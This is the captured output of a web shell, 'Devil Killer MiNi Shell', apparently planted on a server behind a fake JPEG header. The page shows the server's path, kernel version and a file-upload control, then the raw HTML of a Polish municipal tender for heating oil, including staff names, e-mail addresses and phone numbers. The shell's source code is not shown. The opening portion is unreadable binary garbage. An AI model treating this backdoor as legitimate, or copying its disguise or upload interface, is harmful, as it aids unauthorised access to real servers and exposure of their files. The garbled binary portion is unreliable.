JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211201/0029362101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sukcesywna dostawa lekkiego oleju opałowego od 1 stycznia 2022 r. do 31 grudnia 2022 r. do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MAŁKINIA GÓRNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550667920</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przedszkolna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Małkinia Górna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">29 644 80 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">29 74 55 118</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@malkiniagorna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.malkiniagorna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa lekkiego oleju opałowego od 1 stycznia 2022 r. do 31 grudnia 2022 r. do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93689e16-5279-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00293621</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002932/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Dostawy oleju opałowego do budynków będących własnością Gminy Małkinia Górna w 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej dbarszcz@malkiniagorna.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja w postępowaniu w tym składanie ofert, wymiana informacji oraz przekazywanie<br/>dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2019 r. poz. 123 i 730). 2. Ofertę,<br/>oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie<br/>dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a<br/>także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się, pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. 3.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do<br/>„Formularza do komunikacji&#34;.4. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP).5.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku&#34; i „Formularza do komunikacji&#34; wynosi 150 MB.6. Za<br/>datę przekazania oferty, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych<br/>kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na<br/>ePUAP.7. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w<br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców&#34; lub ze strony głównej z zakładki<br/>Postępowania.8. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami w szczególności składanie oświadczeń, wniosków (innych niż wskazanych w Rozdziale<br/>14 ust.6), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza: „Formularz do komunikacji&#34; dostępnego na ePUAP oraz udostępnionego<br/>przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub ID postępowania)9. Zamawiający może<br/>również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email<br/>aplawski@malkiniagorna.pl10. Dokumenty elektroniczne, składane są przez Wykonawcę za<br/>pośrednictwem „Formularza do komunikacji&#34; jako załączniki. Zamawiający dopuszcza również<br/>możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w<br/>pkt 10 adres email. Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.Osobą<br/>uprawnioną do porozumiewania się z Wykonawcami jest: Pani Danuta Barszcz tel. 29 644 87 97, email:<br/>dbarszcz@malkiniagorna.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych osobowych jest<br/>Wójt Gminy Małkinia Górna, adres ul. Przedszkolna 1, 07-320 Małkinia Górna , tel. 29 644 80 002)<br/>administrator wyznaczył Inspektora Danych Osobowych, panią Anetę Liszewską z którym można się<br/>kontaktować pod adresem e-mail: aliszewska@malkiniagorna.pl, e-mail: iodo@malkiniagorna.pl. 3)<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie<br/>podstawowym.4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.5) Pani/Pana<br/>dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 p.z.p. przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisanych ustawy p.z.p. związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego.7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO.8) posiada Pani/Pan:a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z<br/>tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać<br/>Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego<br/>lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą p.z.p oraz<br/>nie może naruszać integralności protokołu oraz jego załączników);c) na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o<br/>których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego);d) prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO; 9) nie przysługuje Pani/Panu:a) w związku z art. 17<br/>ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b) prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO;c) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO; 10) przysługuje Pani/Panu prawo wniesienia skargi do organu<br/>nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez<br/>administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OAS.272.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	Przedmiotem zamówienia jest sukcesywna dostawa oleju opałowego do placówek oświatowych, jednostek OSP oraz budynków będących własnością Gminy Małkinia Górna od 1 stycznia 2022 r. do 31 grudnia 2022 r., tj.:<br/>1	Szkoła Podstawowa nr 1 im. Marii Curie – Skłodowskiej w Małkini Górnej, ul. Ostrowska 58, 07-320 Małkinia Górna.<br/>2	Szkoła Podstawowa w Orle, Orło 11, 07-320 Małkinia Górna.<br/>3	Szkoła Podstawowa im. Jana Pawła II w Prostyni, Prostyń 60, 07-319 Prostyń.<br/>4	Żłobek Gminny w Małkini Górnej, ul. Nurska 67, 07-320 Małkinia Górna.<br/>5	Ochotnicza Straż Pożarna w Małkini Górnej, ul. Ostrowska 9, 07-320 Małkinia Górna.<br/>6	Ochotnicza Straż Pożarna w Grądach, Grądy 37, 07-319 Prostyń<br/>w terminie od 1stycznia 2022 r. do 31 grudnia 2022r.<br/>Planuje się, że dostawy oleju opałowego odbędą się zgodnie z prognozowaną ilością wg tabeli zawartej w SWZ.<br/>Dostarczany olej opałowy winien być I klasy jakości i spełniać następujące warunki jakościowe <br/>określone Polską Normą oraz charakteryzować się następującymi parametrami: <br/>1) wartość opałowa nie niższa niż: 42,60 MJ/kg, <br/>2) gęstość w temperaturze 15 0 C nie wyższa niż: 900 kg/m3, <br/>3) lepkość kinematyczna w temperaturze 20 0 C nie większa niż: 6,0 mm2/s, <br/>4) temperatura zapłonu nie niższa niż: 56 0 C, <br/>5) temperatura płynięcia nie wyższa niż: (-20 0 C), <br/>6) skład frakcyjny: <br/>a) do temperatury 250 0 C destyluje się nie więcej niż 65% (v/v), <br/>b) do temperatury 350 0 C destyluje się nie mniej niż 85% (v/v,) <br/>7) pozostałość po koksowaniu w 10% pozostałości destylacyjnej nie większa niż 0,30% (m/m), <br/>8) pozostałość po spopieleniu 0,010% (m/m), <br/>9) zawartość siarki nie więcej niż 0,10% (m/m), <br/>10) zawartość wody nie większa niż 200 mg/kg, <br/>11) całkowita zawartość zanieczyszczeń nie większa niż 24 mg/kg.<br/>Ze względu na specyfikę przedmiotu zamówienia, zamawiający nie jest w stanie precyzyjnie <br/>określić ilości oleju, który zostanie dostarczony do jednostek w okresie obowiązywania <br/>umowy. W tej sytuacji zarówno zamawiający, jak i Wykonawcy biorący udział w postępowaniu <br/>w swoich szacunkach mogą opierać się wyłącznie na danych archiwalnych, własnej wiedzy <br/>i doświadczeniu. <br/> Dostawa oleju będzie się odbywać na zgłoszenie pocztą elektroniczną: <br/>- bezpośrednio do wskazanej jednostki, <br/>- w ciągu 48 godzin od zgłoszenia, <br/>- w ilościach określonych w zgłoszeniu – wraz z każdorazową dostawą przedkładane będą <br/>świadectwa jakości, nie później niż z fakturą, <br/>- wymienione dostawy obejmują pełny zakres, t.j. załadunek na środek transportu, transport <br/>oraz rozładunek w miejscu przeznaczenia. Środek transportu musi być wyposażony <br/>w przewoźną instalację pomiarową z aktualnym świadectwem legalizacji. Dowodem <br/>przyjęcia dostawy oleju opałowego będzie dokument WZ z wydrukiem ilości faktycznej <br/>dostarczonego paliwa. Jest dopuszczalny wzrost lub spadek cen paliw niezależny <br/>od Dostawcy. W przypadku zmiany cen paliw w trakcie realizacji zamówienia, przy każdym <br/>zamówieniu cząstkowym musi być załączony przez Dostawcę komunikat o procentowym wzroście lub zniżce rynkowych cen paliw. Zamawiający zastrzega, <br/>iż z przyczyn niezależnych od niego, może nastąpić mniejsze wykorzystanie ilości <br/>przedmiotu zamówienia, bez konsekwencji dla Zamawiającego.<br/>Zamawiający wypełnił swoje obowiązki jako nabywca paliw opałowych, które wynikają <br/>z art. 89 ust. 5 pkt 1,3 i 4 ustawy z dnia 6 grudnia 2008 r. o podatku akcyzowym <br/>(Dz. U. z 2020 r., poz. 722 z późn. zm.). <br/>Gmina Małkinia Górna dokonała zgłoszenia rejestracyjnego w akcyzie (AKC-RU) i uzyskała status „zużywającego podmiotu olejowego”. Po podpisaniu umowy zarejestrowane dane zostaną przekazane Wykonawcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi <br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał <br/>spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Punktacja<br/>1.	Cena 60 pkt<br/>2.	Stały opust	40 pkt<br/>Razem :	100 pkt<br/><br/> Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej. <br/> <br/>Cena – 60% <br/>Cena będzie oceniana metodą punktową według wzoru: <br/> Cena najtańszej oferty <br/> ------------------------------------- x 60 pkt <br/> Cena badanej oferty <br/> <br/>Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny. <br/>Stały opust – 40% <br/>Stały opust będzie oceniany według wzoru: <br/> Opust badanej oferty <br/>------------------------------------------------- x 40 pkt <br/> Najwyższy opust spośród oferowanych<br/><br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) <br/>+ liczba punktów za stały opust (maks. 40 pkt)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Stały opust</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu <br/>dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: <br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że posiada. <br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada koncesję <br/>na obrót paliwami ciekłymi. <br/>3) sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>4) zdolności technicznej lub zawodowej: <br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie <br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie <br/>przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów <br/>technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy <br/>może mieć negatywny wpływ na realizację zamówienia na każdym etapie postępowania <br/>(art. 116 ust. 2 ustawy Pzp). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) potwierdzających brak podstaw wykluczenia: <br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, 